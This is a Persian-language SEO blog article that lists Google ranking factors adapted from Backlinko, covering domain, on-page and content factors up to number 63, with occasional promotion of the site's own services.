بدون دیدگاه
2019/08/05
3389 بازدید

209 فاکتور سئو (آپدیت سال 2021)

در این مقاله قصد داریم برای شما 209 فاکتورهای مهم سئو که توسط سایت backlinko نوشته شده است را بازگو کنیم. بعضی از این فاکتورهای سئو از اهمیت بیشتری برخوردار هستند و برخی کمتر، اما چیزی که مهم است این است که همه ی آنها توسط گوگل تایید شده است. پس اگر می خواهید بدانید که برای بهبود رتبه سایتتان در گوگل به چه چیز هایی باید توجه داشته باشید این مقاله را تا انتها بخوانید، همچنین توجه داشته باشید که فاکتورها بر اساس میزان اهمیت مرتب شده نیستند اما ما بخش هایی که از اهمیت بیشتری برخوردارند را برای شما با علامت * مشخص می کنیم، اما باز هم تکرار می کنیم که این، اهمیت مطلق نیست.

اگر با مبحث سئو آشنایی چندانی ندارید، پیشنهاد می کنم ابتدا مقاله آموزش سئو مبتدی را مطالعه کنید تا با مفاهیم و مقدمات سئو بیشتر آشنا شوید.

تمامی این فاکتورها در عوامل زیر دسته بندی شده اند:

 • عوامل دامنه
 • عوامل سطح صفحه
 • عوامل سطح سایت
 • عوامل بک لینک
 • تعامل کاربر
 • قوانین خاص الگوریتم گوگل
 • علائم تجاری
 • عوامل  اسپم در سایت
 • عوامل اسپم خارج از سایت

 

فاکتورهای سئو مربوط به دامنه (Domain Seo Factors)

فاکتورهای سئو مربوط به دامنه

1- قدمت دامنه

این فاکتور قبلا خیلی پررنگ‌تر بود. یعنی هرچه طول عمر یک دامنه بیشتر بود گوگل یا هر موتور جستجوی دیگه ای اهمیت بیشتری به آن سایت می دادند. آن هم به این علت بود که از نظر موتور های جستجو دامنه هایی که در یک موضوع خاص سالها فعالیت داشته اند نقش مرجع بودن را دارند و احتمالا بیشتر از بقیه سایت ها برای کاربر مفید خواهند بود.

اما در سال 2019 این فاکتور خیلی به چشم نمیاد و ارزش بالایی ندارند و الان هر سایتی کیفیت بالایی داشته باشد و برای مخاطب ارزشی خلق کند به سرعت ارزشمند می‌شود. با این حساب، تفاوت دامنه‌ای که شش ماه ازعمر آن می‌گذرد با دامنه‌ای که یکساله است، زیاد نیست. به عبارت دیگر، سن دامنه برای گوگل چندان اهمیتی ندارد. اگر سایت شما تازه تاسیس است اصلا نگران این مورد نباشید.

2- وجود کلمه کلیدی در دامنه

بودن کلمه کلیدی در دامنه، خیلی جزو فاکتورهای مهم سئو نیست، اما می تواند یک سیگنال مثبت به گوگل باشد، بطور مثال اگر سایت شما در مورد موبایل است وجود کلمه mobile در دامنه می تواند به گوگل یک سیگنال مثبت بدهد. اما اگر نام زیبایی برای سایت خود انتخاب کرده اید و فکر می‌کنید که این نام توانایی برند شدن را دارد هیچ وقت آن را فدای کلمه کلیدی نکنید.

چون اینقدر موضوعات و فاکتورهای مهمی در سئو وجود دارند که این فاکتور اصلا به چشم نمی‌آید. عموما، موتورهای جستجو، کلمات کلیدی که در نام دامنه آورده شده است را به صورت متمایز نشان می‌دهند. که این کلمات برای گوگل مانند راهنما عمل می کنند.

3- شروع شدن دامنه با کلمه کلیدی

وجود کلمه کلیدی در اول دامنه می تواند یک امتیاز مثبت نسبت به کسانی که کلمه کلیدی در دامنه خود ندارند باشد. از نظر دیجیتال مارکتینگ، بودن کلمه کلیدی در نام دامین باعث افزایش نرخ کلیک (CTR) و جلب اعتماد کاربران می‌شود.

دامنه‌ ای که با کلمه کلیدی شاخص هدف مورد نظر شروع می‌شود، نسبت به دامنه ‌هایی که کلمۀ کلیدی در آخر یا وسط قرار گرفته است، و یا اصلا از کلمه کلیدی در آن استفاده نشده است، از اهمیت ویژه تری برخوردار است. 

4- مدت زمان خرید دامنه 

مطلبی که از گوگل منتشر شد:

دامنه های ارزشمند اغلب برای چندین سال پیش پرداخت می شوند، در حالی که دامنه های کم اعتبار به ندرت بیش از یک سال استفاده می شود. بنابراین، تاریخی که یک دامنه در آینده به پایان می رسد، می تواند به عنوان یک عامل در پیش بینی مشروعیت یک دامنه مورد استفاده قرار گیرد.

یعنی اگر شما دامین خود را به صورت ۵ ساله خریداری می‌کنید این حس را به موتور های جستجو می‌دهید که بیزینس شما جدی است و قصد ندارید بعد از گذشت یک سال آن را رها کنید.

5- کلیدواژه در Subdomain

بر اساس تایید متخصصان سایت MOZ، کلیدواژه ای که در زیر دامنه (subdomain) ظاهر می شود، رتبه بندی را افزایش دهد. ما در مورد subdomain بطور کامل در مقاله زیر دامنه (subdomain) چیست؟ توضیح داده ایم.

کلیدواژه در Subdomain

ذکر این نکته الزامی است که این فاکتور برای خود ساب دامین موثر است و تاثیری روی سایت اصلی ندارد. یعنی تصور نشود که شما با ساخت چندین ساب دامین با کلمات کلیدی می‌توانید به سئو سایت خودتون کمک کنید.

6- تاریخچه دامنه

تاریخچه سایت ممکن است بعد از مدتی توسط گوگل باز گردد بنابراین حتماً تاریخچه دامنه ای که می خرید یا پر می کنید را در سایت های whois بررسی کنید، همچنین در موارد خاص، ممکن است سایتی توسط گوگل جریمه یا اصطلاحاً پنالتی شده باشد که این جریمه به شخص جدید نیز منتقل شود.

خب مقداری واضح‌تر توضیخ می‌دهیم:
قبل از خرید دامنه مورد نظر و در صورت خالی بودن آن، ابتدا از دامنه هویز بگیرید ببینید دامنه قبلا فعال بوده یا نه. اگر فعال بوده در چه حوزه ای فعالیت داشته و فالیت اسپم داشته یا خیر.

اگر دامنه ای که خریداری می‌کنید قبلا فعال بوده و به صورت اسپم فعالیت داشته، بعد از خرید شما و بالا آمدن سایت جدید همچنان نمره منفی گذشته با سایت همراه است و موتور های جستجو مخصوصا گوگل به دید منفی به سایت شما نگاه می‌کنند و ممکن است سایت شما اصلا رشد خوبی نداشته باشد.

7- مطابقت كامل دامنه با کلمه کلیدی

یکی بودن کلمه کلیدی بصورت دقیق با نام دامنه می تواند یک امتیاز مثبت برای شما باشد. البته اگر سایت ضعیفی نداشته باشید و سایر فاکتورهای سئو را درست رعایت کرده باشید، در غیر این صورت دچار جریمه از طرف گوگل خواهید شد. منظور از مطابقت کامل نام دامنه با کلمه کلیدی این است که فرض کنید شما سایت فروش موبایل دارید، انتخاب نام دامنه buymobile می تواند به گوگل بفهماند که دقیقاً سایت شما در مورد چیست.

در این صورت، یکسان بودن و مرتبط بودن نام دامنه با کلمه کلیدی، به گوگل این امکان را می دهد که بتواند حیطه فعالیت شما را شناسایی کند. اگر وب سایت شما حرفه‌ای باشد EMD یک امتیاز مثبت تلقی می‌شود. اما تاثیری در سایت‌های ضعیف ندارد.

8- مخفی کردن اطلاعات مالک دامنه

درصورتی که اطلاعات دامنه خود را از دید موتور های جستجو مخفی کنید، ممکن است این کار به این موتور ها این مفهوم را برساند که این سایت قصد دارد خدمات غیر مجاز ارائه دهد و چیزی برای مخفی کردن دارد.

مات کاترز نقل قول کرده است:

 “… وقتی که دامنه آنها را چک کردم، همه آنها از ” سرویس حفاظت از حریم خصوصی “برخوردار بودند.  این نسبتا غیر معمول است … داشتن دامنه شخصي و حفاظت شده،به صورت خودکار بد نیست، اما هنگامی که شما دارای یک کسب و کار عمومی هستید و این مورد را استفاده می کنید، نشان می دهد که شما می خواهید چیزی را از کسی پنهان نمایید.

9- صاحب مجرم دامنه

اگر گوگل یک فرد خاص را به عنوان یک اسپمر شناسایی کند، این امر كاملا منطقي است که سایر سایت های متعلق به آن شخص را نيز مورد بررسي قرار دهند. حتی اگر شما در سرویس جیمیل خود چندین سایت دارید و برای یکی از سایت ها به صورت اسپم و سیاه فعالیت می‌کنید، بعد از اینکه گوگل شما را شناسایی کند به تمامی دامین های روی همان حساب جیمیل نیز حساس می‌شود.

10- توسعه TLD كشور ها

داشتن دامنه سطح بالا با کد مخصوص هر کشور (.cn، .pt، .ca) می تواند به رتبه سایت برای آن کشور کمک کند … اما می تواند توانایی سایت را در سطح جهانی محدود کند. بطور مثال اگر در ایران فعالیت دارید و سایت شما تنها از ایران مشتری خواهد پذیرفت، استفاده از دامنه .ir می تواند به شما در رتبه بندی بهتر کمک کند، البته شما می توانید بطور دستی هم از طریق گوگل وبمستر ناحیه فعالیت خودتان را مشخص نمایید.

فاکتورهای سئو صفحات سایت

فاکتورهای سئو صفحات سایت

*11. کلیدواژه در شروع عنوان

شروع عنوان مطلب با استفاده از کلمه کلیدی یا کلیدواژه یک سیگنال مثبت به گوگل می فرستد، اما به این شکل نیست که شما عنوان خود را به خاطر این فاکتور سئو خراب کنید و یا از حالت کاربر پسند بودن آن را خارج کنید.

اگه بتوانید به گونه ای این کار را انجام دهید که هم عنوان شما جذاب باشد و هم از کلمه کلیدی در ابتدای عنوان استفاده کرده باشید این یعنی شما این فاکتور را به درستی انجام داده اید.

کلیدواژه در فاکتورهای سئو

12- شروع عنوان با کلمه کلیدی

بر اساس صحبت های سایت Moz، عنوانی که با یک کلمه کلیدی شروع می شود، بهتر از عنوان هایی است که کلمه کلیدی به سمت انتهای عنوان رفته است.

13- کلمه کلیدی در توصیف صفحه (description)

گوگل از تگ meta description به عنوان یک سیگنال رتبه بندی مستقیم استفاده نمی کند. با این حال، تگ توضیحات شما می تواند بر میزان کلیک (CTR)، که یک عامل رتبه بندی کلیدی است، تاثیر بگذارد. سعی کنید در دسکریپشن خود دقیقا چیزی بنویسید که قرار است به کاربران خود ارائه دهید.

14- کلید واژه در H1 وجود داشته باشد

تگ های H1 در حقیقت عنوان دوم هستند. با توجه به نتایج حاصل از بررسی دقیق، Google همراه با عنوان شما (title)، از H1 شما ،به عنوان یک سیگنال مرتبط استفاده می کند. به همین دلیل وجود کلمه کلیدی در عنوان دوم یا همان H1 می تواند به گوگل بفهماند موضوع صفحه در مورد چیست.

h1 در فاکتورهای مهم سئو

15- استفاده از کلمه کلیدی در متن TF – IDF

“چند بار کلمه کلیدی در یک سند ظاهر می شود؟”  زمانی که شما از یک کلمه خاص در محتوای خود استفاده می کنید و آن کلمه را بارها تکرار می کنید، در حقیقت به گوگل می‌فهمانید که این مطلب در مورد این کلمه کلیدی خاص است، بطور مثال ما در این مقاله از کلمه “فاکتورهای سئو” بارها استفاده کرده ایم که نشان می دهد این مقاله در مورد فاکتورهای سئو توضیح داده است. گوگل برای فهمیدن موضوع مقاله از یک نسخه پیشرفته TF-IDF،استفاده می کند. ما در مقاله ی آموزش انتخاب کلمه کلیدی در مورد کلمات کلیدی در سئو بطور کامل توضیح داده ایم که میتوانید این مطلب رو هم مطالعه کنید.

16- طول محتوا

محتوا های طولانی تر می توان گفت که جامع تر و کامل تر یک موضوع را بررسی کرده اند، البته این گفته ممکن است در مواردی اشتباه هم باشد، اما بیشتر مواقع درست است، تجربه نشان داده که محتواهای طولانی تر با توجه به الگوریتم های گوگل رتبه بهتری نسبت به محتواهای کوتاه تر می گیرند، البته نه هر محتوای بلندی! محتوایی که یک مطلب را بطور کامل پوشش دهد.

شما اگر بتوانید محتوایی بالای هزار کلمه تولید کنید که یک موضوع را به صورت کامل مورد بررسی قرار دهد و توضیحات مفیدی ارائه دهد قطعا شانس داشتن رتبه بهتری نسبت به یک محتوای ۳۰۰ کلمه ای خواهید داشت.

از طرف دیگر، شما در محتواهای طولانی می‌توانید از کلمه کلیدی ها و LSI های متنوعی در مقاله استفاده کنید که همین موضوع باعث می‌شود شما در کلمات زیادی بتوانید رتبه و ورودی بالا کسب کنید.

البته این نکته لازم به ذکر است که به حاطر محتوای طولانی، هیچگاه کیفیت محتوا را پایین نیارید؛ زیرا باعث می‌شود کاربر از محتوای شما ناراضی باشد و سایت شما را کلا ببندد و بانس ریت و پوگو استیکینگ اتفاق بیفتد که به ضرر شماست.

طول محتوا در فاکتورهای مهم سئو

17- فهرست مطالب

با استفاده از یک جدول مرتبط با محتوا ، گوگل بهتر مي تواند محتوای صفحه ی شما را درك كند.  همچنین می تواند در نمایش نتایج سایت شما را بهتر نمایش دهد:

فهرست مطالب در فاکتورهای مهم seo

همچنین وقتی از فهرست های محتوا استفاده می‌کنید، این شانس را دارید که گوگل، لینک ها و موضوعات شما را در صفحه نمایش جستجو های خود در زیر سایت شما نمایش بدهد که مانند تصویر بالا از سایت بک لینکو می شود.

18- تراکم کلمات کلیدی

بکار بردن زیاد کلمه کلیدی در الگوریتم های جدید گوگل دیگر مانند قبل نیست، یعنی دیگر نیاز نیست که شما بارها در محتوای خود از کلمه کلیدی استفاده کنید، البته توجه داشته باشید که استفاده بسیار زیاد از کلمه کلیدی در متن در حقیقت سوء استفاده از کلمه کلیدی تلقی می شود و ممکن است گوگل شما را بر اساس الگوریتم پاندا جریمه کند.

شما باید در متن خود از LSI  ها استفاده کنید که در مورد این فاکتور مهم سئو در بخش بعدی توضیح بیشتری می‌دهیم.

نیازی نیست که شما بارها از عین کلمه کلیدی اصلی خود استفاده کنید و همچنین نیازی نیست که برای محتوای خود فقط یک کلمه کلیدی در نظر بگیرید. با به وجود آمدن رنک برین، هوش مصنوعی گوگل بسیار باهوش شده است و روز به روز به سمت فهم بیشتر کلمات سرچ شده از سمت کاربران پیش می‌رود. به همین دلیل ،گوگل محتوای شما را درک می‌کند و مثل قبل نیازی نیست باره،از عین کلمه کلیدی در متن استفاده کنید. ولی شما باید تمام تلاش خود را بکنید تا محتوای شما برای الگوریتم رنک برین قابل فهم باشد که یکی از این راه ها استفاده از LSI است.

توصیه میکنم مقاله آموزش جامع الگوریتم rankbrain را مطالعه کنید تا با درک بالاتری از این الگوریتم محتواهای حرفه ای تری ایجاد کنید.

19-استفاده از LSI در محتوا

کلمات کلیدی LSI به موتورهای جستجو کمک می کنند تا معانی مختلف، واژه هایی که بیش از یک معنی دارند،را به شما نشان دهد (مثلا: تور برای تور دروازه یا تور ماهیگیری و یا تور گردشگری) حضور / عدم وجود LSI احتمالا همچنین به عنوان یک سیگنال کیفیت محتوا عمل می کند، ما در مقاله LSI در سئو چیست؟ بطور کامل در مورد این مطلب توضیح داده ایم که می توانید این مقاله را هم بررسی کنید.

شما با استفاده از LSI ها می توانید به گوگل در درک بهتر محتوای خود کمک کنید و شانس بالا بودن در کلمات محتلف را داشته باشید. ما در ویکی دمی بارها پیش آمده است که برای یک صفحه یا مقاله با بیشتر از ۳۰ کلمه کلیدی ورودی دریافت کرده ایم و هرکدام از آن کلمات را در گوگل سرچ می‌کردیم سایت ما در صفحه اول و یا دوم قرار داشته است.

20- کلمات کلیدی LSI در title و description

طبق محتوای صفحه وب، کلیدواژه های LSI در برچسب هاي صفحه meta، احتمالا به گوگل کمک می کند تا بین کلمات با معانی بالقوه متعدد، قدرت تشخيص و انتخاب داشته باشد. همچنین می تواند به عنوان یک سیگنال مثبت جهت فهمیدن موضوع مطلب شما عمل نماید.

٢١. نوشتن مقالات بصورت عمقی

بين عمق موضوع و رتبه بندى هاى گوگل، نوعى همبستگى و ارتباط وجود دارد. بنابراين صفحاتى كه همه ى زوايا را از نظر موضوعى پوشش مي دهند، نسبت به صفحاتى كه تنها يك موضوع را بررسى مي كنند، برتر هستند. یکی از مهمترین راه های فهمیدن این موضوع برای گوگل رفتار کاربران می باشد که معمولا کاربران در محتواهای عمیق و مفهومی و طولانی زمان بیشتری را سپری می‌کنند و اینگونه سایت ها معمولا کاربران وفادار زیادی پیدا می‌کنند که یه صورت روزانه به سایت سر می‌زنند.

بهترین فاکتورهای سئو

٢٢. سرعت لود شدن يك صفحه توسط HTML آن

هم گوگل و هم بينگ سرعت لود شدن صفحه را يكى از فاكتورهاى رنك (رتبه) بندى صفحات قرار داده اند. اسپايدر و يا همان عنكبوتهاى موتورهاى جستجو، وظيفه  دارند كه با توجه به كد HTML شما، سرعت تقريبى لود شدن صفحه را براورد كنند.

فاکتور سرعت سایت در سئو

٢٣. سرعت لود شدن صفحه توسط Chrome

گوگل از Chrome user data هم براى بهتر حدس زدن زمان مورد نياز لود شدن يك صفحه استفاده مي كند. بدين ترتيب، مي توانند بفهمند كه واقعا چقدر طول مي كشد كه صفحه ى مورد نظر براى استفاده ى كاربر لود شود.

٢٤. استفاده از AMP

AMP درحاليكه يكى از فاكتورهاى مستقيم رنكينگ گوگل نيست، مي تواند يكى از مهمترينها در قسمت سوالات رايج اخبار گوگل، در نسخه ى لود شده در موبايل باشد.

سایت هایی که از این فاکتور سئو استفاده می‌کنند سرعت بالاتری در اختیار کاربران خود قرار می‌دهند و این عامل باعث ایجاد یک تجربه‌ی خوب برای کاربر می‌شود. به صورت کلی، گوگل AMP را دوست دارد و واقعیت این است که سایت هایی که از این تکنولوژی استتفاده می‌کنند پتانسیل بالاتری برای به دست آوردن رتبه های بهتری در گوگل دارند.
اگر از سایت وردپرسی استفاده می‌کنید بهتره که مقاله آموزش‌AMP برای وردپرس را مطالعه کنید.

٢٥. مطابقت موضوع صفحه با محتوای صفحه

کاربران با هدف، سرچ خود را انجام می‌دهند و دقیقا می دانند که می‌خواهند چه چیزی را ببینند یعنی دقیقا می دانند که می‌خواهند چه محصولی را مشاهده کنند، چه محتوایی را مطالعه کنند یا چه تصویر و یا فیلمی را ببینند به همین دلیل اگر وارد سایتی شوند که محتوای آن با چیزی که در موضوع صفحه نوشته اند مغایرت داشته باشد از آن صفحه خارج می‌شوند.
آيا محتواى صفحه ى مورد نظر، با آنچه كه كاربر دنبالش است مطابقت دارد؟ در اينصورت، ممكن است كه رنك آن صفحه به خاطر كلمه ى كليدى اى كه مورد جستجو قرار گرفته كمى بهبود يابد.

٢٦. مرغ مگس خوار (هامينگ برد) گوگل

اين تغيير الگوريتمى، به گوگل كمك كرد كه به چيزى فراتر از كلمات كليدى برسد. با تشكر از hummingbird امروزه گوگل مي تواند موضوع يك صفحه ى وب را بهتر متوجه شود.

برای اطلاعات دقیق در مورد این الگوریتم گوگل، بهتر است که مقاله الگوریتم مرغ مگس خوار را مطالعه کنید.

٢٧. مطالب تكرارى

مطالب كاملا شبيه به هم روى يك وبسايت (حتى وقتى كمى تغيير يافته باشد) مي تواند تاثيرى منفى روى آنچه كه از وبسايت در موتورهاى جستجو نمايان مي شود داشته باشد.

  خرید بک لینک EDU و GOV|لینک سازی در سایت های آموزشی و دولتی

شاید برای خیلی از شما پیش آمده باشد که در گوگل یک صفحه‌ی اشتباهی به جای صفحه ای که می خواهید نمایش داده شود، به کاربران نمایش داده می‌شود. خب این اتفاق از نظر شما اشتباه است اما از نظر گوگل کاملا درست است و در واقعیت شما اشتباه کرده اید نه گوگل.

گوگل یک موتور جستجو است که ربات آن وظیفه دارد طبق الگوریتمی که برای آن تعریف شده است وظیقه خود را انجام دهد.

وقتی شما بین ۲ تا از صفحه های سایتتان شباهت درست کرده اید خب طبیعی است که این ربات نتواند منظور شما را به درستی بفهمد. و اینجاست که محتوای مشابه می تواند آسیب های جدی به سایت وارد کند.

در بعضی از موارد آنقدر شباهت متنی و موضوعی وجود دارد که گوگل تصمیم می گیرد هیچکدام از لینک های شما را نمایش ندهد.

٢٨. تگ Rel = Canonical

اگر از آن استفاده ى درست شود، ممكن است گوگل از جريمه ى وبسايتتان بابت محتواهاى تكرارى چشم پوشى كند.

استفاده درست از کنونیکال یعنی در شرایطی که نیاز است از آن استفاده شود و بی جهت از یک صفجه به صفحه‌ی دیگر کنونی کال داده نشود.

برای آشنایی کامل با این تگ، لطفا مقاله کنونی کال چیست را مطالعه کنید.

٢٩. بهينه سازى تصويرى

تصاوير، بسته به نامشان، متون مربوطه شان، عنوان، توضيحاتشان و شرحشان، هميشه براى گوگل سيگنال هاى مهمى مي فرستند.

٣٠. آپدیت مستمر نوشته ها

آخرين آپديت هاى الگوریتم گوگل كافئین، مخصوصاً براى جستجوگرانى كه به وقتشان اهميت مي دهند بسيار مهم است. با مورد توجه قرار دادن اهميت اين فاكتور، گوگل تاريخ آخرين آپديت برخى صفحات را نشان خواهد داد.

فاکتور آپدیت محتوا در seo

٣١. قدرت و اهميت به روزرسانى محتواها

اهميت به روزرسانى و تغيير محتوايى، يكى از فاكتورهاى نشانگر تازگى اطلاعات يك صفحه است. كم كردن يا بيشتر كردن كل بخش يك محتوا بسيار مهم تر از جابجا كردن ترتيب چند كلمه يا تصحيح يك اشتباه تايپيست.

٣٢. به روزرسانى تاريخ صفحات

در طول زمان، چندبار يك صفحه به روزرسانى شده؟ روزانه؟ هفتگى؟ يا اينكه ٥سال يكبار؟ تكرر به روزرسانى شدن يك صفحه نيز يكى از فاكتورهاى مهم است.

٣٣. برجستگى كلمات كليدى

اينكه در ١٠٠كلمه اى اول يك محتوا يك كلمه ى كليدى آمده باشد، قطعا در رتبه بندى صفحات اول در گوگل موثر است.

٣٤. كلمات كليدى در تگهاى H2 و H3

اينكه كلمه ى كليدى مورد استفاده تان در يك فرمت H2 يا H3 به عنوان سرتيتر شناخته شود، ممكن است نشانى از ضعيف بودن ارتباطش با موضوع محتوا باشد. جان مولر در این رابطه می‌گوید: تگ‌های HTML به ما کمک می‌کند که بفهمیم ساختار یک صفحه چگونه است.

٣٥.كيفيت و قدرتي كه سايت ها توسط لينك خارجي كسب مي كنند

خيلي از سئوكارها معتقدند كه لينك دادن به سايت هاي قدرتمند تاثيرات مثبتي روي سئوي سايت دارد و باعث رتبه بندي بالاتر در گوگل مي شود. در صورتی که بدنبال لینک سازی خارجی از نوع کلاه سفید هستید، می توانید برای آشنایی بیشتر با پکیج های بهینه سازی سایت به تیم ویکی دمی تیکت بزنید تا در اسرع وقت با شما تماس گیرند.

٣٦.موضوع لينك هاي خارجي

با توجه به الگوريتم Hillop (لينك)، گوگل ممكن است از محتواي صفحاتي كه در وبسايتتان به آنها لينك مي دهيد، به عنوان يك سيگنال مرتبط استفاده كند. براي مثال، اگر يک صفحه اي با محتواي در رابطه با خودرو داشته باشيد و در آن به يك صفحه ي با محتواي مربوط به فيلم لينك دهيد، گوگل ممكن است فكر كند كه صفحه تان در رابطه با فيلم هاي ماشيني است، نه اتوموبيل! 

٣٧.گرامر و املا

يكي از علائم كيفيت سايت گرامر و املاي صحيح است. به کارگیری صحیح  دستور زبان و املا، یکی از عوامل کیفیت سایت است. البته مت کاتز این موضوع را تا حدودی رد کرد.

٣٨.محتوای تولید خودتان

آيا محتوايتان را خودتان نوشته ايد؟ اگر محتوايتان را از يك صفحه ي ايندكس شده كپي كرده باشيد، در رتبه بندي گوگل قرار نخواهيد گرفت. يا حتي ممكن است صفحه تان توسط ربات هاي گوگل برسي و ايندكس نشود.

٣٩.نسخه ي موبايل-فرندلي

الگوریتم موبايل فرندلي كه اغلب با عنوان Mobilegeddon ناميده مي شود، صفحاتي را كه براي موبايل بهينه شده اند را به درستي به روزرساني مي كند.

٤٠.قابليت استفاده با موبايل

وبسايت هايي كه كاربران ميتوانند با استفاده از موبايل براحتي به آن دسترسي داشته باشند، طبق الگوريتم Mobile-first index گوگل، جايگاه بالاتري خواهند داشت.

٤١. محتواهاي “نهان” در موبايل

محتواهايي كه در موبايل نهان هستند، به نسبت محتواهاي آشكار، احتمال ايندكس شدن كمتري دارند. اگرچه اخيراً يك جستجوگري اظهار داشته كه اين محتواهاي نهان مشكلي ندارند، اما به هر حال محتوايي كه مهم باشد، بايد آشكار باشد.

٤٢.محتواهاي مكمل كمك كننده

يكي از شاخص هاي كيفيت سايت و رتبه بندي خوب در گوگل، داشتن محتواهاي مكمل در وبسايت است. محتواهاي مكمل شامل مبادلات ارز، حسابگرهاي بهره وام و دستورالعمل هاي تعاملي مي شود.

٤٣. محتواهايي كه در پنجره مخفي هستند

اگر كاربران مجبور باشند كه براي خواندن محتوايتان روي يك پنجره كليك كنند، آن محتواي درواقع مخفي، ممكن است توسط گوگل ايندكس نشود.

٤٤. تعداد لينك هاي خارجي

داشتن لينك هاي خارجي زياد در به رتبه بندي صفحه لطمه ميزند.چنانچه از لینک‌های خروجی dofollow بیشتر از حد معمول استفاده کنید، ممکن است  به page rank  شما آسیب بزند و تأثیر منفی روی رتبه سایت داشته باشد.

٤٥.مولتي مديا

داشتن ويدئو، تصوير و ديگر مولتي مدياها مي توانند به كيفيت محتوا كمك كنند. در واقع، استفاده از تصاویر، فیلم و ویدئو، صدا و هر نوع محتوای چند رسانه ای در سایت و صفحات نشان از وضعیت خوب آن صفحه است.

در نتیجه طبق بررسی های ویکی دمی، محتوای چند رسانه ای می توانند به عنوان یک فاکتور کیفیت محتوا عمل کنند. ارتباط بين مولتي مديا و رتبه بندي را مي توانيد در تصوير زير مشاهده كنيد:

مولتي مديا در فاکتورهای سئو

٤٦. تعداد لينك هايي كه از درون وبسايت به صفحات دروني وبسايت ميدهيم(لينك هاي داخلي)

تعداد لينك هايي كه در يك محتوا به يك صفحه دروني سايت مي دهيم، در واقع اهميت آن صفحه را نشان مي دهد. هرچه تعداد لينك ها به يك صفحه بيشتر باشد، آن صفحه از اهميت بيشتري برخوردار است.

٤٧. كيفيت تعداد لينك هايي كه از درون وبسايت به صفحات دروني وبسايت مي دهيم

اگر در محتوا يا مقالات به صفحات معتبر دروني وبسايتتان لينك دهيد،تاثير گذارتر است به نسبت زماني كه به صفحات غيرمعتبر وبسايتتان لينك دهيد.

٤٨. لينك هاي خراب یا شکسته

وجود تعداد زيادي لينك خراب نشان دهنده ي يك وبسايت رها شده است!  google rater guidelines document، براي سنجيدن كيفيت صفحه اصلي يك وبسايت، از لينك هاي خراب موجود در آن سايت استفاده مي كند.

٤٩.reading level

در اينكه گوگل reading level يك وب پيج را ارزيابي مي كند شكي نيست. حتي در گذشته آمارش را در اختيارتان قرار ميداد،

 اما هميشه بر سر اينكه اطلاعات reading level چه چيز را نشان مي دهند بحث بوده است. عده اي معتقدند كه داشتن يك reading level بنيادي، باعث مي شود كه در رتبه بندي جايگاه بهتري داشته باشيد، از آنجايي كه براي عمده ي مردم جذاب است. عده ي ديگر محتوا و reading level بنيادي را وابسته مي دانند.

reading level در فاکتورهای مهم سئو

٥٠. لينك هاي وابسته

لينك هاي وابسته به تنهايي به سايت شما لطمه اي وارد نمي كنند. اما اگر تعدادشان بيش از حد باشد ممكن است الگوريتم گوگل براي اطمينان از اينكه شما يك سايت وابسته نيستيد، به علائم كيفي ديگري روي وبسايتتان دقت كند.

۵۱. خطاهای HTML/ اعتبار سنجی W3C

بسیاری از خطاهای HTML یا برنامه نویسی ناقص ممکن است نشانه یک سایت با کیفیت پایین باشد. در حالی که این موضوع بحث برانگیز است، بسیاری از افراد که در حوزه سئو فعالیت دارند، فکر می کنند که از یک صفحه با کدگذاری مناسب به عنوان یک سیگنال کیفیت استفاده می شود.

۵۲. اعتبار دامنه (Domain Authority)

اگر دو صفحه در همه زمینه ها مشابه  باشند، صفحه‌ای که بر روی یک دامنه معتبر قرار گرفته است رتبه بالاتری نسبت به صفحاتی که در دامنه‌های ضعیف و بی اعتبار قرار گرفته‌اند، خواهد داشت.

قدرت دامنه در 200 فاکتور سئو

۵۳.  رتبه صفحه (Page Rank)

این موضوع کاملاً با رتبه مرتبط نیست. اما به نظر می رسد صفحاتی که قدرتمند، صفحاتی که لینک های کمی دارند را از رده خارج می کنند! برای هر یک از صفحات سایت اعتباری به نام PageRank یا رتبه صفحه در نظر گرفته می شود، که اهمیت چندانی برای سئو ندارد. اما صفحاتی که اعتبار بیشتری دارند رتبه بهتری در گوگل خواهند داشت.

۵۴. طول URL

URL های بیش از حد طولانی ممکن است به دیده شدن صفحه توسط موتورهای جستجو آسیب برسانند. در حقیقت، چندین تحقیق در مطالعات صنعتی نشان داده اند که URLهای کوتاه دارای برتری کوچکی نسبت به طولانی تر ها در نتایج گوگل دارند.

فاکتور طول URL در سئو

۵۵. مسیرURL

ممکن است صفحه ای که نزدیک به صفحه اصلی است در مقایسه با صفحاتی که در عمق سایت هستند، قدرت بیشتری برای نمایش در نتایج گوگل داشته باشند.

۵۶. ویراستاران

اگرچه این مورد هنوز تأیید نشده است، اما گوگل حق انحصاری یک اختراع را ثبت کرده که به ویراستاران انسانی اجازه می‌دهد بر روی SERP تأثیر داشته باشند.

۵۷.  دسته‌بندی صفحات سایت

ذسته ای که صفحه در آن ظاهر می شود یک سیگنال ارتباط است. صفحه ای که بخشی از یک رده است، ممکن است در مقایسه با صفحه ای که تحت یک رده غیر مرتبط قرار دارد، سیگنال ارتباط بیشتری داشته باشد.

ویکی دمی اعلام می کند که دسته بندی هایی که صفحات سایت در آن ها قرار می گیرند (دسته بندی می شوند) می تواند یک فاکتور مرتبط باشد.

۵۸.برچسب های وردپرس

برچسب ها سیگنال ارتباط خاص وردپرس هستند. Yoast.comدر این باره اعلام کرده است که :

استفاده از تگ ها می تواند به شما کمک فراوانی نماید، زیرا با استفاده از این کار می توانید پست های مرتبط را به هم وصل نمایید و متصل کنید.

۵۹. کلید واژه در URL

یکی دیگر از سیگنال های ارتباط است. یکی از نماینده های گوگل به تازگی این موضوع را به عنوان”یک عامل رتبه بندی بسیار کوچک” که به هر حال یکی از فاکتورهای سئو در رتبه بندی محسوب می شود نام برد.

۶۰. رشته URL

دسته بندی های موجود در رشته URL توسط Google خوانده می شوند و ممکن است یک سیگنال موضوعی برای آنچه در یک صفحه موجود است، به حساب آید :

فاکتورهای سئو

۶۱. منابع و مأخذ

درست مثل مقالات پژوهشی، اشاره به منابع و مأخذ ممکن است نشانه ای از کیفیت باشد. دستورالعمل های کیفیت گوگل بیان می کند که در هنگام بازدید از صفحات خاص، بازدیدکنندگان باید از منابع چشم پوشی کنند: “این موضوعی است که تخصص و یا منابع معتبر در آن مهم هستند …”. با این حال، گوگل انکار کرده است که از لینک های خارجی به عنوان یک سیگنال رتبه بندی استفاده می کنند.

۶۲. بولت ها و لیست های شماره گذاری شده

فهرست ها و لیست های شماره دار به تجزیه محتوای شما برای خوانندگان کمک می کند و باعث می شود محتوا مورد پسند کاربر باشد. Google نیز محتوای دارای لیست و فهرست را که منظم باشد را بیشتر ترجیح می دهد.

۶۳.اولویت صفحه در نقشه سایت

اولویتی که از طریق فایل sitemap.xml داده می شود، ممکن است روی رتبه بندی تاثیر بگذارد.

